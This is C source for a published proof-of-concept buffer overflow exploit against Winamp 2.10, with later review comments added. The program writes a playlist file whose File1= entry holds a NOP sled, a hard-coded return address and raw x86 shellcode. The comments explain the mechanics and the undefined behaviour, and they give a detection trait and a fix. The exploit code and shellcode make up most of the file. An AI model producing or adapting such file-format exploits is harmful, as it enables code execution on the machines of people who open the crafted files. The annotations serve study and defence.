/*
 * Stack based buffer overflow exploit for Winamp v2.10
 * Author Steve Fewer, 04-01-2k. Mail me at darkplan@oceanfree.net
 *
 * For a detailed description on the exploit see my advisory.
 *
 * Tested with Winamp v2.10 using Windows98 on an Intel
 * PII 400 with 128MB RAM
 *
 * http://indigo.ie/~lmf
 */

/*
 * Reviewer summary: this program only generates a file. It writes a
 * playlist named crAsh.pls whose single File1= entry is made of three parts
 * emitted back to back: a run of 0x90 filler bytes, a hard-coded 4-byte
 * value (eip), and a block of raw machine-code bytes (sploit).
 *
 * The flaw being demonstrated lives in the player's playlist handling (per
 * the header: a stack-based overflow in Winamp v2.10), not in this program.
 * The lasting fix is a length-checked copy of the File1= value in the
 * parser, i.e. an updated player.
 *
 * A practical detection trait for .pls files is a File1= value that holds
 * hundreds of 0x90 bytes followed by non-printable data where a path or URL
 * is expected.
 */
#include /* NOTE(review): header name lost in page extraction; presumably <stdio.h>, since printf/fopen/fprintf/FILE are used below */

/*
 * Builds crAsh.pls in the current working directory.
 *
 * Returns 0 unconditionally; no I/O call is checked.
 */
int main() {
/* Banner only; no effect on the generated file. */
printf("\n\n\t\t.......................................\n");
printf("\t\t......Nullsoft Winamp 2.10 exploit.....\n");
printf("\t\t.......................................\n");
printf("\t\t.....Author: Steve Fewer, 04-01-2k.....\n");
printf("\t\t.........http://indigo.ie/~lmf.........\n");
printf("\t\t.......................................\n\n");

/* Filler for the File1= value. Only indices 0..579 are ever written. */
char buffer[640];

/*
 * Hard-coded 4-byte value, zero-padded to 8 bytes by the initializer.
 * Presumably it lands on the saved return address (the name suggests EIP).
 * A fixed absolute address ties the file to the tested OS/player build
 * named in the header and assumes a predictable memory layout.
 */
char eip[8] = "\xF7\xCF\xB9\xBF";

/*
 * Raw x86 machine-code payload, zero-padded to 256 bytes by the initializer.
 * NOTE(review): the byte following each "C6 45 xx" opcode spells the ASCII
 * strings "MSVCRT.DLL" and "Hi!"; what the payload does with them is covered
 * by the author's advisory and has not been verified here by disassembly.
 * The payload is placed in the overflowed stack data, so it relies on the
 * stack being executable.
 */
char sploit[256] = "\x55\x8B\xEC\x33\xC0\x50\x50\x50\xC6\x45\xF4\x4D\xC6\x45\xF5\x53"
"\xC6\x45\xF6\x56\xC6\x45\xF7\x43\xC6\x45\xF8\x52\xC6\x45\xF9\x54\xC6\x45\xFA\x2E\xC6"
"\x45\xFB\x44\xC6\x45\xFC\x4C\xC6\x45\xFD\x4C\xBA\xD4\x76\xF7\xbF\x52\x8D\x45\xF4\x50"
"\xFF\x55\xF0\x55\x8B\xEC\x33\xFF\x57\xC6\x45\xFC\x48\xC6\x45\xFD\x69\xC6\x45\xFE\x21"
"\xBA\x2E\x41\xF5\xBF\x52\x57\x8D\x55\xFC\x52\x52\x57\xFF\x55\xF8\x55\x8B\xEC\xBA\xFF"
"\xFF\xFF\xFF\x81\xEA\xFB\xAA\xFF\x87\x52\x33\xC0\x50\xFF\x55\xFC";
FILE *file;

/* 0x90 is the single-byte x86 NOP; 580 of them form the filler run. */
for(int x=0;x<580;x++) { buffer[x] = 0x90; }

/*
 * NOTE(review): the fopen() result is not checked. If the file cannot be
 * created, every fprintf() below and the fclose() receive NULL, which is
 * undefined behaviour.
 */
file = fopen("crAsh.pls","wb");
fprintf(file, "[playlist]\n");
fprintf(file, "File1=");
/*
 * NOTE(review): buffer[580..639] is never initialised and no terminator is
 * stored, so this %s read runs into indeterminate bytes (undefined
 * behaviour). The bytes actually written can differ between builds and runs,
 * so a hash of crAsh.pls is not a stable indicator; match on the structure
 * of the File1= value instead.
 */
fprintf(file, "%s", buffer);
/* %s stops at the first zero byte, so only the 4 initialised bytes of eip are written. */
fprintf(file, "%s", eip);
/* Likewise, the payload is written up to the first zero byte of the padded array. */
fprintf(file, "%s", sploit);
fprintf(file, "\nNumberOfEntries=1");
fclose(file);
printf("\t created file crAsh.pls loaded with the exploit.\n");
return 0; }